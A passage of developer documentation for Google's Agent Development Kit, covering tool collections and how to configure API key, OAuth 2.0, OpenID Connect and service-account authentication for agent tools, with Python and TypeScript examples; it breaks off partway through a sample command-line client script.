number from the first.", parameters: z.object({ a: z.number(), b: z.number() }), execute: subtractNumbers, }), ]; } async getTools(): Promise<BaseTool[]> { return this.tools; } async close(): Promise<void> { console.log("SimpleMathToolset closed."); } } async function main() { const mathToolset = new SimpleMathToolset("calculator_"); const greetTool = new FunctionTool({ name: "greet_user", description: "Greets the user.", parameters: z.object({ name: z.string() }), execute: greetUser, }); const instruction = `You are a calculator and a greeter. If the user asks for a math operation, use the calculator tools. If the user asks for a greeting, use the greet_user tool. The result of the last math operation is stored in the 'last_math_result' state variable.`; const calculatorAgent = new LlmAgent({ name: "calculator_agent", instruction: instruction, tools: [greetTool, mathToolset], model: "gemini-2.5-flash", }); const runner = new InMemoryRunner({ agent: calculatorAgent, appName: "toolset_app" }); await runner.sessionService.createSession({ appName: "toolset_app", userId: "user1", sessionId: "session1" }); const message: Content = createUserContent("What is 5 + 3?"); for await (const event of runner.runAsync({ userId: "user1", sessionId: "session1", newMessage: message })) { if (isFinalResponse(event) && event.content?.parts?.length) { const text = stringifyContent(event).trim(); if (text) { console.log(`Response from agent: ${text}`); } } } await mathToolset.close(); } main(); ``` In this example: - `SimpleMathToolset` implements `BaseToolset` and its `get_tools()` method returns `FunctionTool` instances for `add_numbers` and `subtract_numbers`. It also customizes their names using a prefix. - The `calculator_agent` is configured with both an individual `greet_tool` and an instance of `SimpleMathToolset`. - When `calculator_agent` is run, ADK will call `math_toolset_instance.get_tools()`. 
The agent's LLM will then have access to `greet_user`, `calculator_add_numbers`, and `calculator_subtract_numbers` to handle user requests. - The `add_numbers` tool demonstrates writing to `tool_context.state`, and the agent's instruction mentions reading this state. - The `close()` method is called to ensure any resources held by the toolset are released. Toolsets offer a powerful way to organize, manage, and dynamically provide collections of tools to your ADK agents, leading to more modular, maintainable, and adaptable agentic applications. # Authenticating with Tools Supported in ADK: Python v0.1.0 Many tools need to access protected resources (like user data in Google Calendar, Salesforce records, etc.) and require authentication. ADK provides a system to handle various authentication methods securely. The key components involved are: 1. **`AuthScheme`**: Defines *how* an API expects authentication credentials (e.g., as an API Key in a header, an OAuth 2.0 Bearer token). ADK supports the same types of authentication schemes as OpenAPI 3.0. To learn more about each credential type, refer to [OpenAPI doc: Authentication](https://swagger.io/docs/specification/v3_0/authentication/). ADK uses specific classes like `APIKey`, `HTTPBearer`, `OAuth2`, `OpenIdConnectWithConfig`. 1. **`AuthCredential`**: Holds the *initial* information needed to *start* the authentication process (e.g., your application's OAuth Client ID/Secret, an API key value). It includes an `auth_type` (like `API_KEY`, `OAUTH2`, `SERVICE_ACCOUNT`) specifying the credential type. The general flow involves providing these details when configuring a tool. ADK then attempts to automatically exchange the initial credential for a usable one (like an access token) before the tool makes an API call. For flows requiring user interaction (like OAuth consent), a specific interactive process involving the Agent Client application is triggered. 
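As a rough mental model of the flow described above, the following sketch classifies a credential by what would typically have to happen before an API call. It is a conceptual illustration only: `CredentialType` and `next_auth_step` are hypothetical names, not ADK classes or functions, and the mapping is a simplification of the credential types this guide describes.

```python
from enum import Enum


class CredentialType(Enum):
    # Member names mirror the credential types named in this guide;
    # the enum itself is hypothetical and not part of ADK.
    API_KEY = "API_KEY"
    HTTP = "HTTP"
    OAUTH2 = "OAUTH2"
    OPEN_ID_CONNECT = "OPEN_ID_CONNECT"
    SERVICE_ACCOUNT = "SERVICE_ACCOUNT"


def next_auth_step(credential_type: CredentialType, has_usable_token: bool) -> str:
    """Returns the next step for a credential in this simplified model."""
    if has_usable_token:
        # A usable credential (e.g., an access token) is already available.
        return "call_api"
    if credential_type in (CredentialType.API_KEY, CredentialType.HTTP):
        # Keys and already-obtained bearer tokens usually need no exchange.
        return "call_api"
    if credential_type is CredentialType.SERVICE_ACCOUNT:
        # Typically exchanged for a bearer token without user interaction.
        return "exchange_for_token"
    # OAuth 2.0 and OpenID Connect often need user login or consent.
    return "request_user_consent"


print(next_auth_step(CredentialType.OAUTH2, has_usable_token=False))
```

In a real application the interactive branch corresponds to the client-side handling covered later in this guide; the other branches happen without involving the user.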
## Supported Initial Credential Types - **API_KEY:** For simple key/value authentication. Usually requires no exchange. - **HTTP:** Can represent Basic Auth (not recommended/supported for exchange) or already obtained Bearer tokens. If it's a Bearer token, no exchange is needed. - **OAUTH2:** For standard OAuth 2.0 flows. Requires configuration (client ID, secret, scopes) and often triggers the interactive flow for user consent. - **OPEN_ID_CONNECT:** For authentication based on OpenID Connect. Similar to OAuth2, often requires configuration and user interaction. - **SERVICE_ACCOUNT:** For Google Cloud Service Account credentials (JSON key or Application Default Credentials). Typically exchanged for a Bearer token. ## Configuring Authentication on Tools You set up authentication when defining your tool: - **RestApiTool / OpenAPIToolset**: Pass `auth_scheme` and `auth_credential` during initialization. - **GoogleApiToolSet Tools**: ADK has built-in first-party tools like Google Calendar, BigQuery, etc. Use the toolset's specific method. - **APIHubToolset / ApplicationIntegrationToolset**: Pass `auth_scheme` and `auth_credential` during initialization, if the API managed in API Hub / provided by Application Integration requires authentication. WARNING Storing sensitive credentials like access tokens and especially refresh tokens directly in the session state might pose security risks depending on your session storage backend (`SessionService`) and overall application security posture. - **`InMemorySessionService`:** Suitable for testing and development, but data is lost when the process ends. Less risk as it's transient. - **Database/Persistent Storage:** **Strongly consider encrypting** the token data before storing it in the database using a robust encryption library (like `cryptography`) and managing encryption keys securely (e.g., using a key management service). 
- **Secure Secret Stores:** For production environments, storing sensitive credentials in a dedicated secret manager (like Google Cloud Secret Manager or HashiCorp Vault) is the **most recommended approach**. Your tool could potentially store only short-lived access tokens or secure references (not the refresh token itself) in the session state, fetching the necessary secrets from the secure store when needed. ______________________________________________________________________ ## Journey 1: Building Agentic Applications with Authenticated Tools This section focuses on using pre-existing tools (like those from `RestApiTool` / `OpenAPIToolset`, `APIHubToolset`, `GoogleApiToolSet`) that require authentication within your agentic application. Your main responsibility is configuring the tools and handling the client-side part of interactive authentication flows (if required by the tool). ### 1. Configuring Tools with Authentication When adding an authenticated tool to your agent, you need to provide its required `AuthScheme` and your application's initial `AuthCredential`. **A. Using OpenAPI-based Toolsets (`OpenAPIToolset`, `APIHubToolset`, etc.)** Pass the scheme and credential during toolset initialization. The toolset applies them to all generated tools. Here are a few ways to create tools with authentication in ADK. Create a tool requiring an API Key. ```py from google.adk.tools.openapi_tool.auth.auth_helpers import token_to_scheme_credential from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset auth_scheme, auth_credential = token_to_scheme_credential( "apikey", "query", "apikey", "YOUR_API_KEY_STRING" ) sample_api_toolset = OpenAPIToolset( spec_str="...", # Fill this with an OpenAPI spec string spec_str_type="yaml", auth_scheme=auth_scheme, auth_credential=auth_credential, ) ``` Create a tool requiring OAuth2. 
```py from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset from fastapi.openapi.models import OAuth2 from fastapi.openapi.models import OAuthFlowAuthorizationCode from fastapi.openapi.models import OAuthFlows from google.adk.auth import AuthCredential from google.adk.auth import AuthCredentialTypes from google.adk.auth import OAuth2Auth auth_scheme = OAuth2( flows=OAuthFlows( authorizationCode=OAuthFlowAuthorizationCode( authorizationUrl="https://accounts.google.com/o/oauth2/auth", tokenUrl="https://oauth2.googleapis.com/token", scopes={ "https://www.googleapis.com/auth/calendar": "calendar scope" }, ) ) ) auth_credential = AuthCredential( auth_type=AuthCredentialTypes.OAUTH2, oauth2=OAuth2Auth( client_id=YOUR_OAUTH_CLIENT_ID, client_secret=YOUR_OAUTH_CLIENT_SECRET ), ) calendar_api_toolset = OpenAPIToolset( spec_str=google_calendar_openapi_spec_str, # Fill this with an openapi spec spec_str_type='yaml', auth_scheme=auth_scheme, auth_credential=auth_credential, ) ``` Create a tool requiring Service Account. ```py import json from google.adk.tools.openapi_tool.auth.auth_helpers import service_account_dict_to_scheme_credential from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset service_account_cred = json.loads(service_account_json_str) auth_scheme, auth_credential = service_account_dict_to_scheme_credential( config=service_account_cred, scopes=["https://www.googleapis.com/auth/cloud-platform"], ) sample_toolset = OpenAPIToolset( spec_str=sa_openapi_spec_str, # Fill this with an openapi spec spec_str_type='json', auth_scheme=auth_scheme, auth_credential=auth_credential, ) ``` Create a tool requiring OpenID Connect. 
```py from google.adk.auth.auth_schemes import OpenIdConnectWithConfig from google.adk.auth.auth_credential import AuthCredential, AuthCredentialTypes, OAuth2Auth from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset auth_scheme = OpenIdConnectWithConfig( authorization_endpoint=OAUTH2_AUTH_ENDPOINT_URL, token_endpoint=OAUTH2_TOKEN_ENDPOINT_URL, scopes=['openid', 'YOUR_OAUTH_SCOPES'] ) auth_credential = AuthCredential( auth_type=AuthCredentialTypes.OPEN_ID_CONNECT, oauth2=OAuth2Auth( client_id="...", client_secret="...", ) ) userinfo_toolset = OpenAPIToolset( spec_str=content, # Fill in an actual spec spec_str_type='yaml', auth_scheme=auth_scheme, auth_credential=auth_credential, ) ``` **B. Using Google API Toolsets (e.g., `calendar_tool_set`)** These toolsets often have dedicated configuration methods. Tip: For how to create a Google OAuth Client ID & Secret, see this guide: [Get your Google API Client ID](https://developers.google.com/identity/gsi/web/guides/get-google-api-clientid#get_your_google_api_client_id) ```py # Example: Configuring Google Calendar Tools from google.adk.tools.google_api_tool import calendar_tool_set client_id = "YOUR_GOOGLE_OAUTH_CLIENT_ID.apps.googleusercontent.com" client_secret = "YOUR_GOOGLE_OAUTH_CLIENT_SECRET" # Use the specific configure method for this toolset type calendar_tool_set.configure_auth( client_id=client_id, client_secret=client_secret ) # agent = LlmAgent(..., tools=calendar_tool_set.get_tool('calendar_tool_set')) ``` The sequence diagram of the auth request flow (where tools request auth credentials) is shown below: ### 2. Handling the Interactive OAuth/OIDC Flow (Client-Side) If a tool requires user login/consent (typically OAuth 2.0 or OIDC), the ADK framework pauses execution and signals your **Agent Client** application. There are two cases: - **Agent Client** application runs the agent directly (via `runner.run_async`) in the same process. e.g. 
UI backend, CLI app, or Spark job etc. - **Agent Client** application interacts with ADK's FastAPI server via the `/run` or `/run_sse` endpoint. ADK's FastAPI server can be set up on the same server as the **Agent Client** application or on a different one. The second case is a special case of the first, because the `/run` or `/run_sse` endpoint also invokes `runner.run_async`. The only differences are: - Whether to call a Python function to run the agent (first case) or call a service endpoint to run the agent (second case). - Whether the result events are in-memory objects (first case) or serialized JSON strings in the HTTP response (second case). The sections below focus on the first case; you should be able to map it to the second case straightforwardly. We also describe differences to handle for the second case where necessary. Here's the step-by-step process for your client application: **Step 1: Run Agent & Detect Auth Request** - Initiate the agent interaction using `runner.run_async`. - Iterate through the yielded events. - Look for a specific function call event whose function call has a special name: `adk_request_credential`. This event signals that user interaction is needed. You can use helper functions to identify this event and extract necessary information. (For the second case, the logic is similar: you deserialize the event from the HTTP response.) ```py # runner = Runner(...) # session = await session_service.create_session(...) # content = types.Content(...)
# User's initial query print("\nRunning agent...") events_async = runner.run_async( session_id=session.id, user_id='user', new_message=content ) auth_request_function_call_id, auth_config = None, None async for event in events_async: # Use helper to check for the specific auth request event if (auth_request_function_call := get_auth_request_function_call(event)): print("--> Authentication required by agent.") # Store the ID needed to respond later if not (auth_request_function_call_id := auth_request_function_call.id): raise ValueError(f'Cannot get function call id from function call: {auth_request_function_call}') # Get the AuthConfig containing the auth_uri etc. auth_config = get_auth_config(auth_request_function_call) break # Stop processing events for now, need user interaction if not auth_request_function_call_id: print("\nAuth not required or agent finished.") # return # Or handle final response if received ``` *Helper functions `helpers.py`:* ```py from google.adk.events import Event from google.adk.auth import AuthConfig # Import necessary type from google.genai import types def get_auth_request_function_call(event: Event) -> types.FunctionCall: # Get the special auth request function call from the event if not event.content or not event.content.parts: return for part in event.content.parts: if ( part and part.function_call and part.function_call.name == 'adk_request_credential' and event.long_running_tool_ids and part.function_call.id in event.long_running_tool_ids ): return part.function_call def get_auth_config(auth_request_function_call: types.FunctionCall) -> AuthConfig: # Extracts the AuthConfig object from the arguments of the auth request function call if not auth_request_function_call.args or not (auth_config := auth_request_function_call.args.get('authConfig')): raise ValueError(f'Cannot get auth config from function call: {auth_request_function_call}') if isinstance(auth_config, dict): auth_config = AuthConfig.model_validate(auth_config) elif not 
isinstance(auth_config, AuthConfig): raise ValueError(f'Cannot get auth config {auth_config} is not an instance of AuthConfig.') return auth_config ``` **Step 2: Redirect User for Authorization** - Get the authorization URL (`auth_uri`) from the `auth_config` extracted in the previous step. - **Crucially, append your application's** `redirect_uri` as a query parameter to this `auth_uri`. This `redirect_uri` must be pre-registered with your OAuth provider (e.g., [Google Cloud Console](https://developers.google.com/identity/protocols/oauth2/web-server#creatingcred), [Okta admin panel](https://developer.okta.com/docs/guides/sign-into-web-app-redirect/spring-boot/main/#create-an-app-integration-in-the-admin-console)). - Direct the user to this complete URL (e.g., open it in their browser). ```py # (Continuing after detecting auth needed) if auth_request_function_call_id and auth_config: # Get the base authorization URL from the AuthConfig base_auth_uri = auth_config.exchanged_auth_credential.oauth2.auth_uri if base_auth_uri: redirect_uri = 'http://localhost:8000/callback' # MUST match your OAuth client app config # Append redirect_uri (use urlencode in production) auth_request_uri = base_auth_uri + f'&redirect_uri={redirect_uri}' # Now you need to redirect your end user to this auth_request_uri or ask them to open this auth_request_uri in their browser # This auth_request_uri should be served by the corresponding auth provider and the end user should log in and authorize your application to access their data # And then the auth provider will redirect the end user to the redirect_uri you provided # Next step: Get this callback URL from the user (or your web server handler) else: print("ERROR: Auth URI not found in auth_config.") # Handle error ``` **Step 3: Handle the Redirect Callback (Client)** - Your application must have a mechanism (e.g., a web server route at the `redirect_uri`) to receive the user after they authorize the application with the provider.
- The provider redirects the user to your `redirect_uri` and appends an authorization code (the `code` parameter, and potentially `state` and `scope`) as query parameters to the URL. - Capture the **full callback URL** from this incoming request. - (This step happens outside the main agent execution loop, in your web server or equivalent callback handler.) **Step 4: Send Authentication Result Back to ADK (Client)** - Once you have the full callback URL (containing the authorization code), retrieve the `auth_request_function_call_id` and the `auth_config` object saved in Client Step 1. - Set the captured callback URL into the `exchanged_auth_credential.oauth2.auth_response_uri` field. Also ensure `exchanged_auth_credential.oauth2.redirect_uri` contains the redirect URI you used. - Create a `types.Content` object containing a `types.Part` with a `types.FunctionResponse`. - Set `name` to `"adk_request_credential"`. (Note: This is a special name for ADK to proceed with authentication. Do not use other names.) - Set `id` to the `auth_request_function_call_id` you saved. - Set `response` to the *serialized* (e.g., `.model_dump()`) updated `AuthConfig` object. - Call `runner.run_async` **again** for the same session, passing this `FunctionResponse` content as the `new_message`. ```py # (Continuing after user interaction) # Simulate getting the callback URL (e.g., from user paste or web handler) auth_response_uri = await get_user_input( f'Paste the full callback URL here:\n> ' ) auth_response_uri = auth_response_uri.strip() # Clean input if not auth_response_uri: print("Callback URL not provided.
Aborting.") return # Update the received AuthConfig with the callback details auth_config.exchanged_auth_credential.oauth2.auth_response_uri = auth_response_uri # Also include the redirect_uri used, as the token exchange might need it auth_config.exchanged_auth_credential.oauth2.redirect_uri = redirect_uri # Construct the FunctionResponse Content object auth_content = types.Content( role='user', # Role can be 'user' when sending a FunctionResponse parts=[ types.Part( function_response=types.FunctionResponse( id=auth_request_function_call_id, # Link to the original request name='adk_request_credential', # Special framework function name response=auth_config.model_dump() # Send back the *updated* AuthConfig ) ) ], ) # --- Resume Execution --- print("\nSubmitting authentication details back to the agent...") events_async_after_auth = runner.run_async( session_id=session.id, user_id='user', new_message=auth_content, # Send the FunctionResponse back ) # --- Process Final Agent Output --- print("\n--- Agent Response after Authentication ---") async for event in events_async_after_auth: # Process events normally, expecting the tool call to succeed now print(event) # Print the full event for inspection ``` Note: Authorization response with Resume feature If your ADK agent workflow is configured with the [Resume](/adk-docs/runtime/resume/) feature, you also must include the Invocation ID (`invocation_id`) parameter with the authorization response. The Invocation ID you provide must be the same invocation that generated the authorization request, otherwise the system starts a new invocation with the authorization response. If your agent uses the Resume feature, consider including the Invocation ID as a parameter with your authorization request, so it can be included with the authorization response. For more details on using the Resume feature, see [Resume stopped agents](/adk-docs/runtime/resume/). 
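Steps 2 and 3 above append `redirect_uri` by plain string concatenation and leave parsing of the callback URL to the client. The following is a minimal sketch, using only the Python standard library, of how a client might URL-encode the redirect URI and read the `code` and `state` values from the callback. The helper names `append_query_params` and `parse_callback` are hypothetical and are not part of ADK; ADK itself only needs the full callback URL, so the parsing helper is useful mainly for logging or validating `state` on the client side.

```python
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit


def append_query_params(base_uri: str, params: dict[str, str]) -> str:
    """Return base_uri with params URL-encoded and merged into its query string."""
    parts = urlsplit(base_uri)
    extra = urlencode(params)
    # Keep any query string already present on the base URI.
    query = f"{parts.query}&{extra}" if parts.query else extra
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, parts.fragment))


def parse_callback(callback_url: str) -> dict[str, str]:
    """Extract the first value of each query parameter from a callback URL."""
    query = parse_qs(urlsplit(callback_url).query)
    return {key: values[0] for key, values in query.items()}


# Hypothetical provider URL and redirect URI, for illustration only.
auth_request_uri = append_query_params(
    "https://idp.example.com/authorize?client_id=abc",
    {"redirect_uri": "http://localhost:8000/callback"},
)
callback_params = parse_callback("http://localhost:8000/callback?code=xyz&state=123")
```

Encoding the redirect URI this way avoids malformed URLs when it contains characters such as `&` or `?`.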
**Step 5: ADK Handles Token Exchange & Tool Retry and gets Tool result** - ADK receives the `FunctionResponse` for `adk_request_credential`. - It uses the information in the updated `AuthConfig` (including the callback URL containing the code) to perform the OAuth **token exchange** with the provider's token endpoint, obtaining the access token (and possibly refresh token). - ADK internally makes these tokens available by setting them in the session state. - ADK **automatically retries** the original tool call (the one that initially failed due to missing auth). - This time, the tool finds the valid tokens (via `tool_context.get_auth_response()`) and successfully executes the authenticated API call. - The agent receives the actual result from the tool and generates its final response to the user. ______________________________________________________________________ The sequence diagram of the auth response flow (where the Agent Client sends back the auth response and ADK retries the tool call) is shown below: ## Journey 2: Building Custom Tools (`FunctionTool`) Requiring Authentication This section focuses on implementing the authentication logic *inside* your custom Python function when creating a new ADK Tool. We will implement a `FunctionTool` as an example. ### Prerequisites Your function signature *must* include [`tool_context: ToolContext`](https://google.github.io/adk-docs/tools-custom/#tool-context). ADK automatically injects this object, providing access to state and auth mechanisms. ```py from google.adk.tools import FunctionTool, ToolContext from typing import Dict def my_authenticated_tool_function(param1: str, ..., tool_context: ToolContext) -> dict: # ... your logic ...
pass my_tool = FunctionTool(func=my_authenticated_tool_function) ``` ### Authentication Logic within the Tool Function Implement the following steps inside your function: **Step 1: Check for Cached & Valid Credentials:** Inside your tool function, first check if valid credentials (e.g., access/refresh tokens) are already stored from a previous run in this session. Credentials for the current session should be stored in `tool_context.invocation_context.session.state` (a dictionary of state). Check for existing credentials with `tool_context.invocation_context.session.state.get(credential_name, None)`. ```py import json from google.oauth2.credentials import Credentials from google.auth.transport.requests import Request # Inside your tool function TOKEN_CACHE_KEY = "my_tool_tokens" # Choose a unique key SCOPES = ["scope1", "scope2"] # Define required scopes creds = None cached_token_info = tool_context.state.get(TOKEN_CACHE_KEY) if cached_token_info: try: creds = Credentials.from_authorized_user_info(cached_token_info, SCOPES) if not creds.valid and creds.expired and creds.refresh_token: creds.refresh(Request()) tool_context.state[TOKEN_CACHE_KEY] = json.loads(creds.to_json()) # Update cache elif not creds.valid: creds = None # Invalid, needs re-auth tool_context.state[TOKEN_CACHE_KEY] = None except Exception as e: print(f"Error loading/refreshing cached creds: {e}") creds = None tool_context.state[TOKEN_CACHE_KEY] = None if creds and creds.valid: # Skip to Step 5: Make Authenticated API Call pass else: # Proceed to Step 2... pass ``` **Step 2: Check for Auth Response from Client** - If Step 1 didn't yield valid credentials, check if the client just completed the interactive flow by calling `exchanged_credential = tool_context.get_auth_response()`. - This returns the updated `exchanged_credential` object sent back by the client (containing the callback URL in `auth_response_uri`). ```py # Use auth_scheme and auth_credential configured in the tool.
# exchanged_credential: AuthCredential | None exchanged_credential = tool_context.get_auth_response(AuthConfig( auth_scheme=auth_scheme, raw_auth_credential=auth_credential, )) # If exchanged_credential is not None, then there is already an exchanged credential from the auth response. if exchanged_credential: # ADK exchanged the access token already for us access_token = exchanged_credential.oauth2.access_token refresh_token = exchanged_credential.oauth2.refresh_token creds = Credentials( token=access_token, refresh_token=refresh_token, token_uri=auth_scheme.flows.authorizationCode.tokenUrl, client_id=auth_credential.oauth2.client_id, client_secret=auth_credential.oauth2.client_secret, scopes=list(auth_scheme.flows.authorizationCode.scopes.keys()), ) # Cache the token in session state and call the API, skip to step 5 ``` **Step 3: Initiate Authentication Request** If no valid credentials (Step 1) and no auth response (Step 2) are found, the tool needs to start the OAuth flow. Define the AuthScheme and initial AuthCredential and call `tool_context.request_credential()`. Return a response indicating authorization is needed. ```py # Use auth_scheme and auth_credential configured in the tool. tool_context.request_credential(AuthConfig( auth_scheme=auth_scheme, raw_auth_credential=auth_credential, )) return {'pending': True, 'message': 'Awaiting user authentication.'} # By setting request_credential, ADK detects a pending authentication event. It pauses execution and asks the end user to log in. ``` **Step 4: Exchange Authorization Code for Tokens** ADK automatically generates the OAuth authorization URL and presents it to your Agent Client application. Your Agent Client application should follow the same approach described in Journey 1 to redirect the user to the authorization URL (with `redirect_uri` appended).
Once the user completes the login flow at the authorization URL, ADK extracts the authentication callback URL from the Agent Client application, automatically parses the auth code, and generates the auth token. At the next tool call, `tool_context.get_auth_response` in Step 2 will contain a valid credential to use in subsequent API calls. **Step 5: Cache Obtained Credentials** After successfully obtaining the token from ADK (Step 2) or if the token is still valid (Step 1), **immediately store** the new `Credentials` object in `tool_context.state` (serialized, e.g., as JSON) using your cache key. ```py # Inside your tool function, after obtaining 'creds' (either refreshed or newly exchanged) # Cache the new/refreshed tokens tool_context.state[TOKEN_CACHE_KEY] = json.loads(creds.to_json()) print(f"DEBUG: Cached/updated tokens under key: {TOKEN_CACHE_KEY}") # Proceed to Step 6 (Make API Call) ``` **Step 6: Make Authenticated API Call** - Once you have a valid `Credentials` object (`creds` from Step 1 or Step 2), use it to make the actual call to the protected API using the appropriate client library (e.g., `googleapiclient`, `requests`). Pass the `credentials=creds` argument. - Include error handling, especially for `HttpError` 401/403, which might mean the token expired or was revoked between calls. If you get such an error, consider clearing the cached token (`tool_context.state.pop(...)`) and potentially returning the `auth_required` status again to force re-authentication.
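The 401/403 handling described in the last bullet can be sketched as follows. This is an illustration under stated assumptions, not ADK's or the Google client library's API: `ApiAuthError` is a hypothetical stand-in for the client library's HTTP error (with `googleapiclient` you would catch its `HttpError` and inspect the response status instead), a plain dictionary stands in for `tool_context.state`, and `call_with_auth_recovery` is a made-up helper name.

```python
from typing import Any, Callable, MutableMapping

TOKEN_CACHE_KEY = "my_tool_tokens"  # Same cache key as in Step 1


class ApiAuthError(Exception):
    """Hypothetical stand-in for an HTTP error raised by an API client."""

    def __init__(self, status_code: int):
        super().__init__(f"HTTP {status_code}")
        self.status_code = status_code


def call_with_auth_recovery(
    state: MutableMapping[str, Any], api_call: Callable[[], Any]
) -> dict:
    """Run api_call; on 401/403, drop the cached token and ask for re-auth."""
    try:
        return {"status": "success", "data": api_call()}
    except ApiAuthError as err:
        if err.status_code in (401, 403):
            # The token was likely expired or revoked: clear it so the next
            # tool call starts the authentication flow again.
            state.pop(TOKEN_CACHE_KEY, None)
            return {"status": "auth_required", "message": "Please re-authenticate."}
        return {"status": "error", "error_message": str(err)}


def _revoked_call() -> Any:
    # Simulates an API call made with a revoked token.
    raise ApiAuthError(401)


demo_state = {TOKEN_CACHE_KEY: {"token": "stale"}}
demo_result = call_with_auth_recovery(demo_state, _revoked_call)
```

Clearing the cache before returning means the next invocation of the tool falls through Step 1 and Step 2 and requests credentials again in Step 3.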
```py from googleapiclient.discovery import build # Inside your tool function, using the valid 'creds' object # Ensure creds is valid before proceeding if not creds or not creds.valid: return {"status": "error", "error_message": "Cannot proceed without valid credentials."} try: service = build("calendar", "v3", credentials=creds) # Example api_result = service.events().list(...).execute() # Proceed to Step 7 except Exception as e: # Handle API errors (e.g., check for 401/403, maybe clear cache and re-request auth) print(f"ERROR: API call failed: {e}") return {"status": "error", "error_message": f"API call failed: {e}"} ``` **Step 7: Return Tool Result** - After a successful API call, process the result into a dictionary format that is useful for the LLM. - **Crucially, include a `status` field** along with the data. ```py # Inside your tool function, after successful API call processed_result = [...] # Process api_result for the LLM return {"status": "success", "data": processed_result} ``` Full Code tools_and_agent.py ```py import os from google.adk.auth.auth_schemes import OpenIdConnectWithConfig from google.adk.auth.auth_credential import AuthCredential, AuthCredentialTypes, OAuth2Auth from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset from google.adk.agents.llm_agent import LlmAgent # --- Authentication Configuration --- # This section configures how the agent will handle authentication using OpenID Connect (OIDC), # often layered on top of OAuth 2.0. # Define the Authentication Scheme using OpenID Connect. # This object tells the ADK *how* to perform the OIDC/OAuth2 flow. # It requires details specific to your Identity Provider (IDP), like Google OAuth, Okta, Auth0, etc. # Note: Replace the example Okta URLs and credentials with your actual IDP details. # All following fields are required, and available from your IDP. auth_scheme = OpenIdConnectWithConfig( # The URL of the IDP's authorization endpoint where the user is redirected to log in.
authorization_endpoint="https://your-endpoint.okta.com/oauth2/v1/authorize", # The URL of the IDP's token endpoint where the authorization code is exchanged for tokens. token_endpoint="https://your-token-endpoint.okta.com/oauth2/v1/token", # The scopes (permissions) your application requests from the IDP. # 'openid' is standard for OIDC. 'profile' and 'email' request user profile info. scopes=['openid', 'profile', 'email'] ) # Define the Authentication Credentials for your specific application. # This object holds the client identifier and secret that your application uses # to identify itself to the IDP during the OAuth2 flow. # !! SECURITY WARNING: Avoid hardcoding secrets in production code. !! # !! Use environment variables or a secret management system instead. !! auth_credential = AuthCredential( auth_type=AuthCredentialTypes.OPEN_ID_CONNECT, oauth2=OAuth2Auth( client_id="CLIENT_ID", client_secret="CLIENT_SECRET", ) ) # --- Toolset Configuration from OpenAPI Specification --- # This section defines a sample set of tools the agent can use, configured with Authentication # from steps above. # This sample set of tools uses endpoints protected by Okta and requires an OpenID Connect flow # to acquire end user credentials. with open(os.path.join(os.path.dirname(__file__), 'spec.yaml'), 'r') as f: spec_content = f.read() userinfo_toolset = OpenAPIToolset( spec_str=spec_content, spec_str_type='yaml', # ** Crucially, associate the authentication scheme and credentials with these tools. ** # This tells the ADK that the tools require the defined OIDC/OAuth2 flow. auth_scheme=auth_scheme, auth_credential=auth_credential, ) # --- Agent Configuration --- # Configure and create the main LLM Agent.
root_agent = LlmAgent( model='gemini-2.0-flash', name='enterprise_assistant', instruction='Help user integrate with multiple enterprise systems, including retrieving user information which may require authentication.', tools=userinfo_toolset.get_tools(), ) # --- Ready for Use --- # The `root_agent` is now configured with tools protected by OIDC/OAuth2 authentication. # When the agent attempts to use one of these tools, the ADK framework will automatically # trigger the authentication flow defined by `auth_scheme` and `auth_credential` # if valid credentials are not already available in the session. # The subsequent interaction flow would guide the user through the login process and handle # token exchanging, and automatically attach the exchanged token to the endpoint defined in # the tool. ``` agent_cli.py ```py import asyncio from dotenv import load_dotenv from google.adk.artifacts.in_memory_artifact_service import InMemoryArtifactService from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types from .helpers import is_pending_auth_event, get_function_call_id, get_function_call_auth_config, get_user_input from .tools_and_agent import root_agent load_dotenv() agent = root_agent async def async_main(): """ Main asynchronous function orchestrating the agent interaction and authentication flow. """ # --- Step 1: Service Initialization --- # Use in-memory services for session and artifact storage (suitable for demos/testing). session_service = InMemorySessionService() artifacts_service = InMemoryArtifactService() # Create a new user session to maintain conversation state. session = await session_service.create_session( state={}, # Optional state dictionary for session-specific data app_name='my_app', # Application identifier user_id='user' # User identifier ) # --- Step 2: Initial User Query --- # Define the user's initial request.
query = 'Show me my user info' print(f"user: {query}") # Format the query into the Content structure expected by the ADK Runner. content = types.Content(role='user', parts=[types.Part(text=query)]) # Initialize the ADK Runner runner = Runner( app_name='my_app', agent=agent, artifact_service=artifacts_service, session_service=session_service, ) # --- Step 3: Send Query and Handle Potential Auth Request --- print("\nRunning agent with initial query...") events_async = runner.run_async( session_id=session.id, user_id='user', new_message=content ) # Variables to store details if an authentication request occurs. auth_request_event_id, auth_config = None, None # Iterate through the events generated by the first run. async for event in events_async: # Check if this event is the specific 'adk_request_credential' function call. if is_pending_auth_event(event): print("--> Authentication required by agent.") auth_request_event_id = get_function_call_id(event) auth_config = get_function_call_auth_config(event) # Once the auth request is found and processed, exit this loop. # We need to pause execution here to get user input for authentication. break # If no authentication request was detected after processing all events, exit. if not auth_request_event_id or not auth_config: print("\nAuthentication not required for this query or processing finished.") return # Exit the main function # --- Step 4: Manual Authentication Step (Simulated OAuth 2.0 Flow) --- # This section simulates the user interaction part of an OAuth 2.0 flow. # In a real web application, this would involve browser redirects. # Define the Redirect URI. This *must* match one of the URIs registered # with the OAuth provider for your application. The provider sends the user # back here after they approve the request. redirect_uri = 'http://localhost:8000/dev-ui' # Example for local development # Construct the Authorization URL that the user must visit. 
